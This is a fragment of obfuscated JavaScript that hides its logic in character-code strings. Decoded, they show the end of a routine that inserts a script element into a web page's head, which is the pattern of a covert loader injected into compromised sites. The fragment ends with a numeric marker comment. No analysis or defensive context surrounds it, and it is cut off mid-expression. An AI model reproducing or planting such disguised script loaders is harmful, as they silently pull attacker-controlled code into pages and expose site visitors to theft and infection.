32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/